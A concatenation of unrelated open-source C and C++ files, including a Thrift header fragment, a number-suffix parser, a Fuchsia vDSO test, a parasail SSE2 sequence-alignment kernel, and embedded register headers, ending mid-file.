  virtual void printTo(std::ostream& out) const;
  mutable std::string thriftTExceptionMessageHolder_;
  const char* what() const throw();
};

void swap(ThriftNotActiveServiceException &a, ThriftNotActiveServiceException &b);

std::ostream& operator<<(std::ostream& out, const ThriftNotActiveServiceException& obj);

typedef struct _TDiskUsage__isset {
  _TDiskUsage__isset() : tables(false), usage(false) {}
  bool tables :1;
  bool usage :1;
} _TDiskUsage__isset;

class TDiskUsage : public virtual ::apache::thrift::TBase {
 public:

  TDiskUsage(const TDiskUsage&);
  TDiskUsage& operator=(const TDiskUsage&);
  TDiskUsage() : usage(0) {
  }

  virtual ~TDiskUsage() throw();
  std::vector<std::string>  tables;
  int64_t usage;

  _TDiskUsage__isset __isset;

  void __set_tables(const std::vector<std::string> & val);

  void __set_usage(const int64_t val);

  bool operator == (const TDiskUsage & rhs) const
  {
    if (!(tables == rhs.tables))
      return false;
    if (!(usage == rhs.usage))
      return false;
    return true;
  }
  bool operator != (const TDiskUsage &rhs) const {
    return !(*this == rhs);
  }

  bool operator < (const TDiskUsage & ) const;

  uint32_t read(::apache::thrift::protocol::TProtocol* iprot);
  uint32_t write(::apache::thrift::protocol::TProtocol* oprot) const;

  virtual void printTo(std::ostream& out) const;
};

void swap(TDiskUsage &a, TDiskUsage &b);

std::ostream& operator<<(std::ostream& out, const TDiskUsage& obj);

}}}}}} // namespace

#endif
//////////////////////////////////////////////////////////////////////// // // Copyright 2014 PMC-Sierra, Inc. // // This program is free software; you can redistribute it and/or // modify it under the terms of the GNU General Public License // as published by the Free Software Foundation; either version 2 // of the License, or (at your option) any later version. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with this program; if not, write to the Free Software // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. // //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// // // Author: Logan Gunthorpe // // Date: Oct 23 2014 // // Description: // Functions for dealing with number suffixes // //////////////////////////////////////////////////////////////////////// #include "suffix.h" #include <stdlib.h> #include <ctype.h> #include <errno.h> #include <math.h> static struct si_suffix { double magnitude; const char *suffix; } si_suffixes[] = { {1e15, "P"}, {1e12, "T"}, {1e9, "G"}, {1e6, "M"}, {1e3, "k"}, {1e0, ""}, {1e-3, "m"}, {1e-6, "u"}, {1e-9, "n"}, {1e-12, "p"}, {1e-15, "f"}, {0} }; const char *suffix_si_get(double *value) { struct si_suffix *s; for (s = si_suffixes; s->magnitude != 0; s++) { if (*value >= s->magnitude) { *value /= s->magnitude; return s->suffix; } } return ""; } static struct binary_suffix { int shift; const char *suffix; } binary_suffixes[] = { {50, "Pi"}, {40, "Ti"}, {30, "Gi"}, {20, "Mi"}, {10, "Ki"}, {0, ""} }; const char *suffix_binary_get(long long *value) { struct binary_suffix *s; for (s = binary_suffixes; s->shift != 0; s++) { if (llabs(*value) 
>= (1LL << s->shift)) { *value = (*value + (1 << (s->shift - 1))) / (1 << s->shift); return s->suffix; } } return ""; } const char *suffix_dbinary_get(double *value) { struct binary_suffix *s; for (s = binary_suffixes; s->shift != 0; s++) { if (fabs(*value) >= (1LL << s->shift)) { *value = *value / (1 << s->shift); return s->suffix; } } return ""; } long long suffix_binary_parse(const char *value) { char *suffix; errno = 0; long long ret = strtol(value, &suffix, 0); if (errno) return 0; struct binary_suffix *s; for (s = binary_suffixes; s->shift != 0; s++) { if (tolower(suffix[0]) == tolower(s->suffix[0])) { ret <<= s->shift; return ret; } } if (suffix[0] != '\0') errno = EINVAL; return ret; }
#pragma once #include "GameTypes.h" #include "PapyrusArgs.h" class TESObjectREFR; class TESForm; class EnchantmentItem; class VMClassRegistry; class EffectSetting; class BGSListForm; namespace papyrusObjectReference { void RegisterFuncs(VMClassRegistry* registry); UInt32 GetNumItems(TESObjectREFR* pContainerRef); TESForm* GetNthForm(TESObjectREFR* pContainerRef, UInt32 n); float GetTotalItemWeight(TESObjectREFR* pContainerRef); float GetTotalArmorWeight(TESObjectREFR* pContainerRef); void SetItemHealthPercent(TESObjectREFR* object, float value); float GetItemCharge(TESObjectREFR* object); float GetItemMaxCharge(TESObjectREFR* object); void SetItemCharge(TESObjectREFR* object, float value); EnchantmentItem * GetEnchantment(TESObjectREFR* object); void CreateEnchantment(TESObjectREFR* object, float maxCharge, VMArray<EffectSetting*> effects, VMArray<float> magnitudes, VMArray<UInt32> areas, VMArray<UInt32> durations); void SetEnchantment(TESObjectREFR* object, EnchantmentItem * form, float maxCharge); void ResetInventory(TESObjectREFR * obj); bool IsOffLimits(TESObjectREFR * obj); BSFixedString GetDisplayName(TESObjectREFR* object); bool SetDisplayName(TESObjectREFR* object, BSFixedString value, bool force); TESObjectREFR * GetEnableParent(TESObjectREFR* object); bool IsHarvested(TESObjectREFR* pProduceRef); bool HasNiNode(TESObjectREFR * obj, BSFixedString nodeName); float GetNiNodePositionX(TESObjectREFR * obj, BSFixedString nodeName); float GetNiNodePositionY(TESObjectREFR * obj, BSFixedString nodeName); float GetNiNodePositionZ(TESObjectREFR * obj, BSFixedString nodeName); float GetNiNodeScale(TESObjectREFR * obj, BSFixedString nodeName); void SetNiNodeScale(TESObjectREFR * obj, BSFixedString nodeName, float value); void GetAllForms(TESObjectREFR* pContainerRef, BGSListForm * list); }
/* Copyright (C) 1996-2016 Free Software Foundation, Inc.
   This file is part of the GNU C Library.

   The GNU C Library is free software; you can redistribute it and/or
   modify it under the terms of the GNU Lesser General Public
   License as published by the Free Software Foundation; either
   version 2.1 of the License, or (at your option) any later version.

   The GNU C Library is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
   Lesser General Public License for more details.

   You should have received a copy of the GNU Lesser General Public
   License along with the GNU C Library.  If not, see
   <http://www.gnu.org/licenses/>.  */

/* Internal header: only ever pulled in through <netdb.h>.  */
#ifndef _NETDB_H
# error "Never include <bits/netdb.h> directly; use <netdb.h> instead."
#endif


/* Description of data base entry for a single network.  NOTE: here a
   poor assumption is made.  The network number is expected to fit
   into an unsigned long int variable.  */
struct netent
{
  char *n_name;			/* Official name of network.  */
  char **n_aliases;		/* Alias list.  */
  int n_addrtype;		/* Net address type.  */
  /* XXX We should probably use uint32_t for the field and ensure
     compatibility by adding appropriate padding.
     NOTE(review): sizeof(unsigned long) differs between ILP32 and
     LP64 ABIs, so the width of n_net is platform-dependent.  */
  unsigned long int n_net;	/* Network number.  */
};
// Copyright 2017 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#include <fcntl.h>
#include <launchpad/launchpad.h>
#include <zircon/syscalls.h>
#include <zircon/status.h>
#include <lib/fdio/io.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VDSO_FILE "/boot/kernel/vdso/test1"

// Test driver: loads an alternate (test) vDSO image, makes it executable,
// installs it as the vDSO for a child "vdso-variant-helper" process, launches
// the helper, and returns the helper's exit code.
int main(void) {
    // Open the test vDSO image from bootfs.
    int fd = open(VDSO_FILE, O_RDONLY);
    if (fd < 0) {
        printf("%s: %m\n", VDSO_FILE);
        return 1;
    }

    zx_handle_t vdso_vmo_noexec;
    zx_handle_t vdso_vmo;
    // Get a VMO for exactly the file's contents, then drop the fd.
    zx_status_t status = fdio_get_vmo_exact(fd, &vdso_vmo_noexec);
    close(fd);
    if (status != ZX_OK) {
        // fd is already closed here; only its numeric value is reported.
        printf("fdio_get_vmo_exact(%d): %s\n", fd, zx_status_get_string(status));
        return status;
    }

    // The VMO from fdio is not executable; exchange it for an executable one
    // (the call consumes vdso_vmo_noexec).
    status = zx_vmo_replace_as_executable(vdso_vmo_noexec, ZX_HANDLE_INVALID, &vdso_vmo);
    if (status != ZX_OK) {
        printf("zx_vmo_replace_as_executable(%u, ZX_HANDLE_INVALID, *res): %s\n",
               vdso_vmo_noexec, zx_status_get_string(status));
        return status;
    }

    // All launchpad_create()d processes from here on get this vDSO.
    launchpad_set_vdso_vmo(vdso_vmo);

    launchpad_t* lp;
    launchpad_create(ZX_HANDLE_INVALID, "vdso-variant-helper", &lp);
    launchpad_clone(lp, LP_CLONE_ALL);
    launchpad_set_args(lp, 1, (const char*[]){"vdso-variant-helper"});

    // Helper path may be relocated under TEST_ROOT_DIR (empty prefix if unset).
    const char* root_dir = getenv("TEST_ROOT_DIR");
    if (root_dir == NULL) {
        root_dir = "";
    }
    static const char kHelperPath[] = "/bin/vdso-variant-helper";
    // VLA sized for prefix + path + NUL.
    char path[strlen(root_dir) + strlen(kHelperPath) + 1];
    strcpy(path, root_dir);
    strcat(path, kHelperPath);

    launchpad_load_from_file(lp, path);
    zx_handle_t proc;
    const char* errmsg;
    status = launchpad_go(lp, &proc, &errmsg);
    if (status != ZX_OK) {
        printf("launchpad_go: %s\n", errmsg);
        return status;
    }

    // Block until the helper exits, then propagate its return code.
    status = zx_object_wait_one(proc, ZX_PROCESS_TERMINATED, ZX_TIME_INFINITE, NULL);
    if (status != ZX_OK) {
        printf("zx_object_wait_one: %s\n", zx_status_get_string(status));
        return status;
    }
    zx_info_process_t info;
    status = zx_object_get_info(proc, ZX_INFO_PROCESS, &info, sizeof(info), NULL, NULL);
    if (status != ZX_OK) {
        printf("zx_object_get_info: %s\n", zx_status_get_string(status));
        return status;
    }
    return info.return_code;
}
/**
  ******************************************************************************
  * @file    EXTI/EXTI_Example/stm32f4xx_it.h
  * @author  MCD Application Team
  * @version V1.1.0
  * @date    18-January-2013
  * @brief   This file contains the headers of the interrupt handlers.
  ******************************************************************************
  * @attention
  *
  * <h2><center>&copy; COPYRIGHT 2013 STMicroelectronics</center></h2>
  *
  * Licensed under MCD-ST Liberty SW License Agreement V2, (the "License");
  * You may not use this file except in compliance with the License.
  * You may obtain a copy of the License at:
  *
  *        http://www.st.com/software_license_agreement_liberty_v2
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  *
  ******************************************************************************
  */

/* Define to prevent recursive inclusion -------------------------------------*/
#ifndef __STM32F4xx_IT_H
#define __STM32F4xx_IT_H

#ifdef __cplusplus
 extern "C" {
#endif

/* Includes ------------------------------------------------------------------*/
#include "stm32f4xx.h"

/* Exported types ------------------------------------------------------------*/
/* Exported constants --------------------------------------------------------*/
/* Exported macro ------------------------------------------------------------*/
/* Exported functions ------------------------------------------------------- */

/* Cortex-M core exception handlers (names fixed by the startup vector table;
   bodies are presumably in the matching stm32f4xx_it.c -- confirm). */
void NMI_Handler(void);
void HardFault_Handler(void);
void MemManage_Handler(void);
void BusFault_Handler(void);
void UsageFault_Handler(void);
void SVC_Handler(void);
void DebugMon_Handler(void);
void PendSV_Handler(void);
void SysTick_Handler(void);

#ifdef __cplusplus
}
#endif

#endif /* __STM32F4xx_IT_H */
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
/**
 * @file
 *
 * @author jeffrey.daily@gmail.com
 *
 * Copyright (c) 2015 Battelle Memorial Institute.
 */
#include "config.h"

#include <stdint.h>
#include <stdlib.h>

#if defined(_MSC_VER)
#include <intrin.h>
#else
#include <emmintrin.h>
#endif

#include "parasail.h"
#include "parasail/memory.h"
#include "parasail/internal_sse.h"

#ifdef PARASAIL_TABLE
/* Scatter the eight 16-bit lanes of vH into the full score table.
 * Rows are striped: lane s of segment t maps to query row s*seglen+t;
 * d/dlen select the database column.  The 1LL factor keeps the index
 * arithmetic in 64 bits for large tables. */
static inline void arr_store_si128(
        int *array,
        __m128i vH,
        int32_t t,
        int32_t seglen,
        int32_t d,
        int32_t dlen)
{
    array[1LL*(0*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 0);
    array[1LL*(1*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 1);
    array[1LL*(2*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 2);
    array[1LL*(3*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 3);
    array[1LL*(4*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 4);
    array[1LL*(5*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 5);
    array[1LL*(6*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 6);
    array[1LL*(7*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 7);
}
#endif

#ifdef PARASAIL_ROWCOL
/* Store the eight 16-bit lanes of vH into the last-column vector,
 * using the same striped row mapping as arr_store_si128(). */
static inline void arr_store_col(
        int *col,
        __m128i vH,
        int32_t t,
        int32_t seglen)
{
    col[0*seglen+t] = (int16_t)_mm_extract_epi16(vH, 0);
    col[1*seglen+t] = (int16_t)_mm_extract_epi16(vH, 1);
    col[2*seglen+t] = (int16_t)_mm_extract_epi16(vH, 2);
    col[3*seglen+t] = (int16_t)_mm_extract_epi16(vH, 3);
    col[4*seglen+t] = (int16_t)_mm_extract_epi16(vH, 4);
    col[5*seglen+t] = (int16_t)_mm_extract_epi16(vH, 5);
    col[6*seglen+t] = (int16_t)_mm_extract_epi16(vH, 6);
    col[7*seglen+t] = (int16_t)_mm_extract_epi16(vH, 7);
}
#endif

/* Function names depend on which output variant this TU is compiled as. */
#ifdef PARASAIL_TABLE
#define FNAME parasail_nw_table_scan_sse2_128_16
#define PNAME parasail_nw_table_scan_profile_sse2_128_16
#else
#ifdef PARASAIL_ROWCOL
#define FNAME parasail_nw_rowcol_scan_sse2_128_16
#define PNAME parasail_nw_rowcol_scan_profile_sse2_128_16
#else
#define FNAME parasail_nw_scan_sse2_128_16
#define PNAME parasail_nw_scan_profile_sse2_128_16
#endif
#endif

/* Convenience entry point: builds a 16-bit SSE query profile for s1,
 * runs the profile variant (PNAME), and frees the profile. */
parasail_result_t* FNAME(
        const char * const restrict s1, const int s1Len,
        const char * const restrict s2, const int s2Len,
        const int open, const int gap, const parasail_matrix_t *matrix)
{
    parasail_profile_t *profile = parasail_profile_create_sse_128_16(s1, s1Len, matrix);
    parasail_result_t *result = PNAME(profile, s2, s2Len, open, gap);
    parasail_profile_free(profile);
    return result;
}

/* Global (Needleman-Wunsch) alignment using the striped "scan" kernel,
 * SSE2, 8 lanes of 16-bit scores (see PARASAIL_FLAG_* set below).
 * `open`/`gap` are penalties passed as positive values and subtracted.
 * On 16-bit overflow the result is flagged PARASAIL_FLAG_SATURATED and
 * score/end_query/end_ref are zeroed. */
parasail_result_t* PNAME(
        const parasail_profile_t * const restrict profile,
        const char * const restrict s2, const int s2Len,
        const int open, const int gap)
{
    int32_t i = 0;
    int32_t j = 0;
    int32_t k = 0;
    const int s1Len = profile->s1Len;
    int32_t end_query = s1Len-1;
    int32_t end_ref = s2Len-1;
    const parasail_matrix_t *matrix = profile->matrix;
    const int32_t segWidth = 8; /* number of values in vector unit */
    const int32_t segLen = (s1Len + segWidth - 1) / segWidth;
    const int32_t offset = (s1Len - 1) % segLen;
    const int32_t position = (segWidth - 1) - (s1Len - 1) / segLen;
    __m128i* const restrict pvP = (__m128i*)profile->profile16.score;
    __m128i* const restrict pvE = parasail_memalign___m128i(16, segLen);
    int16_t* const restrict boundary = parasail_memalign_int16_t(16, s2Len+1);
    __m128i* const restrict pvHt = parasail_memalign___m128i(16, segLen);
    __m128i* const restrict pvH = parasail_memalign___m128i(16, segLen);
    __m128i* const restrict pvGapper = parasail_memalign___m128i(16, segLen);
    __m128i vGapO = _mm_set1_epi16(open);
    __m128i vGapE = _mm_set1_epi16(gap);
    /* Clamp limits chosen so score +/- one step cannot wrap int16. */
    const int16_t NEG_LIMIT = (-open < matrix->min ?
        INT16_MIN + open : INT16_MIN - matrix->min) + 1;
    const int16_t POS_LIMIT = INT16_MAX - matrix->max - 1;
    __m128i vZero = _mm_setzero_si128();
    int16_t score = NEG_LIMIT;
    __m128i vNegLimit = _mm_set1_epi16(NEG_LIMIT);
    __m128i vPosLimit = _mm_set1_epi16(POS_LIMIT);
    __m128i vSaturationCheckMin = vPosLimit;
    __m128i vSaturationCheckMax = vNegLimit;
    __m128i vNegInfFront = vZero;
    __m128i vSegLenXgap;
#ifdef PARASAIL_TABLE
    parasail_result_t *result = parasail_result_new_table1(segLen*segWidth, s2Len);
#else
#ifdef PARASAIL_ROWCOL
    parasail_result_t *result = parasail_result_new_rowcol1(segLen*segWidth, s2Len);
#else
    parasail_result_t *result = parasail_result_new();
#endif
#endif

    vNegInfFront = _mm_insert_epi16(vNegInfFront, NEG_LIMIT, 0);
    vSegLenXgap = _mm_add_epi16(vNegInfFront,
            _mm_slli_si128(_mm_set1_epi16(-segLen*gap), 2));

    /* initialize H and E */
    {
        int32_t index = 0;
        for (i=0; i<segLen; ++i) {
            int32_t segNum = 0;
            __m128i_16_t h;
            __m128i_16_t e;
            for (segNum=0; segNum<segWidth; ++segNum) {
                /* computed in 64 bits, then clamped, to avoid overflow */
                int64_t tmp = -open-gap*(segNum*segLen+i);
                h.v[segNum] = tmp < INT16_MIN ? INT16_MIN : tmp;
                tmp = tmp - open;
                e.v[segNum] = tmp < INT16_MIN ? INT16_MIN : tmp;
            }
            _mm_store_si128(&pvH[index], h.m);
            _mm_store_si128(&pvE[index], e.m);
            ++index;
        }
    }

    /* initialize upper boundary (first row of the DP matrix) */
    {
        boundary[0] = 0;
        for (i=1; i<=s2Len; ++i) {
            int64_t tmp = -open-gap*(i-1);
            boundary[i] = tmp < INT16_MIN ? INT16_MIN : tmp;
        }
    }

    /* precompute decreasing gap ramp used by the prefix-scan step */
    {
        __m128i vGapper = _mm_sub_epi16(vZero,vGapO);
        for (i=segLen-1; i>=0; --i) {
            _mm_store_si128(pvGapper+i, vGapper);
            vGapper = _mm_sub_epi16(vGapper, vGapE);
        }
    }

    /* outer loop over database sequence */
    for (j=0; j<s2Len; ++j) {
        __m128i vE;
        __m128i vHt;
        __m128i vF;
        __m128i vH;
        __m128i vHp;
        __m128i *pvW;
        __m128i vW;

        /* calculate E */
        /* calculate Ht */
        /* calculate F and H first pass */
        vHp = _mm_load_si128(pvH+(segLen-1));
        vHp = _mm_slli_si128(vHp, 2);
        vHp = _mm_insert_epi16(vHp, boundary[j], 0);
        pvW = pvP + matrix->mapper[(unsigned char)s2[j]]*segLen;
        vHt = _mm_sub_epi16(vNegLimit, pvGapper[0]);
        vF = vNegLimit;
        for (i=0; i<segLen; ++i) {
            vH = _mm_load_si128(pvH+i);
            vE = _mm_load_si128(pvE+i);
            vW = _mm_load_si128(pvW+i);
            vE = _mm_max_epi16(
                    _mm_sub_epi16(vE, vGapE),
                    _mm_sub_epi16(vH, vGapO));
            vHp = _mm_add_epi16(vHp, vW);
            vF = _mm_max_epi16(vF, _mm_add_epi16(vHt, pvGapper[i]));
            vHt = _mm_max_epi16(vE, vHp);
            _mm_store_si128(pvE+i, vE);
            _mm_store_si128(pvHt+i, vHt);
            vHp = vH;
        }

        /* pseudo prefix scan on F and H */
        vHt = _mm_slli_si128(vHt, 2);
        vHt = _mm_insert_epi16(vHt, boundary[j+1], 0);
        vF = _mm_max_epi16(vF, _mm_add_epi16(vHt, pvGapper[0]));
        for (i=0; i<segWidth-2; ++i) {
            __m128i vFt = _mm_slli_si128(vF, 2);
            vFt = _mm_add_epi16(vFt, vSegLenXgap);
            vF = _mm_max_epi16(vF, vFt);
        }

        /* calculate final H */
        vF = _mm_slli_si128(vF, 2);
        vF = _mm_add_epi16(vF, vNegInfFront);
        vH = _mm_max_epi16(vHt, vF);
        for (i=0; i<segLen; ++i) {
            vHt = _mm_load_si128(pvHt+i);
            vF = _mm_max_epi16(
                    _mm_sub_epi16(vF, vGapE),
                    _mm_sub_epi16(vH, vGapO));
            vH = _mm_max_epi16(vHt, vF);
            _mm_store_si128(pvH+i, vH);
            /* track extrema for the post-hoc saturation check */
            vSaturationCheckMin = _mm_min_epi16(vSaturationCheckMin, vH);
            vSaturationCheckMax = _mm_max_epi16(vSaturationCheckMax, vH);
#ifdef PARASAIL_TABLE
            arr_store_si128(result->tables->score_table, vH, i, segLen, j, s2Len);
#endif
        }

#ifdef PARASAIL_ROWCOL
        /* extract last value from the column */
        {
            vH = _mm_load_si128(pvH + offset);
            for (k=0; k<position; ++k) {
                vH = _mm_slli_si128(vH, 2);
            }
            result->rowcols->score_row[j] = (int16_t) _mm_extract_epi16 (vH, 7);
        }
#endif
    }

#ifdef PARASAIL_ROWCOL
    for (i=0; i<segLen; ++i) {
        __m128i vH = _mm_load_si128(pvH+i);
        arr_store_col(result->rowcols->score_col, vH, i, segLen);
    }
#endif

    /* extract last value from the last column */
    {
        __m128i vH = _mm_load_si128(pvH + offset);
        for (k=0; k<position; ++k) {
            vH = _mm_slli_si128(vH, 2);
        }
        score = (int16_t) _mm_extract_epi16 (vH, 7);
    }

    /* if any lane touched a clamp limit, the 16-bit range was exceeded */
    if (_mm_movemask_epi8(_mm_or_si128(
            _mm_cmplt_epi16(vSaturationCheckMin, vNegLimit),
            _mm_cmpgt_epi16(vSaturationCheckMax, vPosLimit)))) {
        result->flag |= PARASAIL_FLAG_SATURATED;
        score = 0;
        end_query = 0;
        end_ref = 0;
    }

    result->score = score;
    result->end_query = end_query;
    result->end_ref = end_ref;
    result->flag |= PARASAIL_FLAG_NW | PARASAIL_FLAG_SCAN
        | PARASAIL_FLAG_BITS_16 | PARASAIL_FLAG_LANES_8;
#ifdef PARASAIL_TABLE
    result->flag |= PARASAIL_FLAG_TABLE;
#endif
#ifdef PARASAIL_ROWCOL
    result->flag |= PARASAIL_FLAG_ROWCOL;
#endif

    parasail_free(pvGapper);
    parasail_free(pvH);
    parasail_free(pvHt);
    parasail_free(boundary);
    parasail_free(pvE);

    return result;
}
/*
 * Copyright (c) 2003-2020 Rony Shapiro <ronys@pwsafe.org>.
 * All rights reserved. Use of the code is allowed under the
 * Artistic License 2.0 terms, as specified in the LICENSE file
 * distributed with this code, or available from
 * http://www.opensource.org/licenses/artistic-license-2.0.php
 */
/** \file StringXStream.h
 *
 * STL-based implementation of secure string streams.
 * typedefs of secure versions of istringstream, ostringstream
 * and stringbuf.
 * Secure in the sense that memory is scrubbed before
 * being returned to system.
 */
#ifndef __STRINGXSTREAM_H
#define __STRINGXSTREAM_H

#include "StringX.h"
#include <sstream>

// stringstream typedefs for StringX
// Each is the standard stream/buffer template instantiated with the
// scrubbing allocator (S_Alloc::SecureAlloc) so stream-internal buffers
// are wiped on release, matching StringX itself.

// Wide-character (wchar_t) variants.
typedef std::basic_stringbuf<wchar_t,
                             std::char_traits<wchar_t>,
                             S_Alloc::SecureAlloc<wchar_t> > wStringXBuf;

typedef std::basic_istringstream<wchar_t,
                                 std::char_traits<wchar_t>,
                                 S_Alloc::SecureAlloc<wchar_t> > wiStringXStream;

typedef std::basic_ostringstream<wchar_t,
                                 std::char_traits<wchar_t>,
                                 S_Alloc::SecureAlloc<wchar_t> > woStringXStream;

typedef std::basic_stringstream<wchar_t,
                                std::char_traits<wchar_t>,
                                S_Alloc::SecureAlloc<wchar_t> > wStringXStream;

// Narrow-character (char) variants.
typedef std::basic_stringbuf<char,
                             std::char_traits<char>,
                             S_Alloc::SecureAlloc<char> > cStringXBuf;

typedef std::basic_istringstream<char,
                                 std::char_traits<char>,
                                 S_Alloc::SecureAlloc<char> > ciStringXStream;

typedef std::basic_ostringstream<char,
                                 std::char_traits<char>,
                                 S_Alloc::SecureAlloc<char> > coStringXStream;

typedef std::basic_stringstream<char,
                                std::char_traits<char>,
                                S_Alloc::SecureAlloc<char> > cStringXStream;

// Unqualified names default to the wide variants.
typedef wStringXBuf StringXBuf;
typedef wiStringXStream iStringXStream;
typedef woStringXStream oStringXStream;
typedef wStringXStream StringXStream;

// Following not related to StringX, but putting it here
// is the lesser of two evils (other is creating a new file
// just for this)
typedef std::wistringstream istringstreamT;
typedef std::wostringstream ostringstreamT;
typedef std::wstringstream stringstreamT;

#endif /* __STRINGXSTREAM_H */
//-----------------------------------------------------------------------------
// Local variables:
// mode: c++
// End:
// Copyright (c) 2020 The Globaltoken Core developers // Distributed under the MIT software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #ifndef BITCOIN_RPC_TREASURY_H #define BITCOIN_RPC_TREASURY_H #include <stdint.h> #include <script/standard.h> class UniValue; class CTreasuryProposal; class CScript; /** Sign the treasury transaction partially */ UniValue SignTreasuryTransactionPartially(CTreasuryProposal& tpsl, CBasicKeyStore *keystore, const UniValue& hashType); /** Treasury Mempool information to JSON */ UniValue treasurymempoolInfoToJSON(); /** Treasury Proposal to JSON */ UniValue proposaltoJSON(const CTreasuryProposal* proposal, int decodeProposalTX); /** Compute Proposal Tx Amount data */ UniValue GetProposalTxInfo(const CTreasuryProposal* pProposal); /** Check if the treasury change address if a valid script address */ bool IsTreasuryChangeAddrValid(const CScript& scriptTreasuryChange, CTxDestination &txDestination); #endif // BITCOIN_RPC_TREASURY_H
/*
 * [origin: Linux kernel arch/arm/mach-at91/include/mach/at91_pmc.h]
 *
 * Copyright (C) 2005 Ivan Kokshaysky
 * Copyright (C) SAN People
 * Copyright (C) 2009 Jens Scharsig (js_at_ng@scharsoft.de)
 *
 * Power Management Controller (PMC) - System peripherals registers.
 * Based on AT91RM9200 datasheet revision E.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 */

#ifndef AT91_PMC_H
#define AT91_PMC_H

/* Absolute register addresses for use from assembly code.
 * ATMEL_BASE_PMC must be provided by the SoC/board configuration. */
#define AT91_ASM_PMC_MOR	(ATMEL_BASE_PMC + 0x20)
#define AT91_ASM_PMC_PLLAR	(ATMEL_BASE_PMC + 0x28)
#define AT91_ASM_PMC_PLLBR	(ATMEL_BASE_PMC + 0x2c)
#define AT91_ASM_PMC_MCKR	(ATMEL_BASE_PMC + 0x30)
#define AT91_ASM_PMC_SR		(ATMEL_BASE_PMC + 0x68)

#ifndef __ASSEMBLY__

#include <asm/types.h>

/* Memory-mapped PMC register block; the per-member comments give each
 * register's byte offset.  The reservedN members are address-space
 * padding only. */
typedef struct at91_pmc {
	u32	scer;		/* 0x00 System Clock Enable Register */
	u32	scdr;		/* 0x04 System Clock Disable Register */
	u32	scsr;		/* 0x08 System Clock Status Register */
	u32	reserved0;
	u32	pcer;		/* 0x10 Peripheral Clock Enable Register */
	u32	pcdr;		/* 0x14 Peripheral Clock Disable Register */
	u32	pcsr;		/* 0x18 Peripheral Clock Status Register */
	u32	uckr;		/* 0x1C UTMI Clock Register */
	u32	mor;		/* 0x20 Main Oscillator Register */
	u32	mcfr;		/* 0x24 Main Clock Frequency Register */
	u32	pllar;		/* 0x28 PLL A Register */
	u32	pllbr;		/* 0x2C PLL B Register */
	u32	mckr;		/* 0x30 Master Clock Register */
	u32	reserved1;
	u32	usb;		/* 0x38 USB Clock Register */
	u32	reserved2;
	u32	pck[4];		/* 0x40 Programmable Clock Register 0 - 3 */
	u32	reserved3[4];
	u32	ier;		/* 0x60 Interrupt Enable Register */
	u32	idr;		/* 0x64 Interrupt Disable Register */
	u32	sr;		/* 0x68 Status Register */
	u32	imr;		/* 0x6C Interrupt Mask Register */
	u32	reserved4[4];
	u32	pllicpr;	/* 0x80 Charge Pump Current Register (SAM9) */
	u32	reserved5[21];
	u32	wpmr;		/* 0xE4 Write Protect Mode Register (CAP0) */
	u32	wpsr;		/* 0xE8 Write Protect Status Register (CAP0) */
	u32	reserved8[5];
} at91_pmc_t;

#endif	/* end not assembly */

/* Main Oscillator Register (MOR) bits */
#define AT91_PMC_MOR_MOSCEN		0x01
#define AT91_PMC_MOR_OSCBYPASS		0x02
#define AT91_PMC_MOR_OSCOUNT(x)		((x & 0xff) << 8)

/* PLL A/B Register field builders */
#define AT91_PMC_PLLXR_DIV(x)		(x & 0xFF)
#define AT91_PMC_PLLXR_PLLCOUNT(x)	((x & 0x3F) << 8)
#define AT91_PMC_PLLXR_OUT(x)		((x & 0x03) << 14)
#define AT91_PMC_PLLXR_MUL(x)		((x & 0x7FF) << 16)
#define AT91_PMC_PLLAR_29		0x20000000
#define AT91_PMC_PLLBR_USBDIV_1		0x00000000
#define AT91_PMC_PLLBR_USBDIV_2		0x10000000
#define AT91_PMC_PLLBR_USBDIV_4		0x20000000

/* Main Clock Frequency Register (MCFR) bits */
#define AT91_PMC_MCFR_MAINRDY		0x00010000
#define AT91_PMC_MCFR_MAINF_MASK	0x0000FFFF

/* Master Clock Register (MCKR): clock source selection and prescaler */
#define AT91_PMC_MCKR_CSS_SLOW		0x00000000
#define AT91_PMC_MCKR_CSS_MAIN		0x00000001
#define AT91_PMC_MCKR_CSS_PLLA		0x00000002
#define AT91_PMC_MCKR_CSS_PLLB		0x00000003
#define AT91_PMC_MCKR_CSS_MASK		0x00000003
#define AT91_PMC_MCKR_PRES_1		0x00000000
#define AT91_PMC_MCKR_PRES_2		0x00000004
#define AT91_PMC_MCKR_PRES_4		0x00000008
#define AT91_PMC_MCKR_PRES_8		0x0000000C
#define AT91_PMC_MCKR_PRES_16		0x00000010
#define AT91_PMC_MCKR_PRES_32		0x00000014
#define AT91_PMC_MCKR_PRES_64		0x00000018
#define AT91_PMC_MCKR_PRES_MASK		0x0000001C

/* MCKR MDIV encoding differs between the AT91RM9200 and later SoCs */
#ifdef CONFIG_AT91RM9200
#define AT91_PMC_MCKR_MDIV_1		0x00000000
#define AT91_PMC_MCKR_MDIV_2		0x00000100
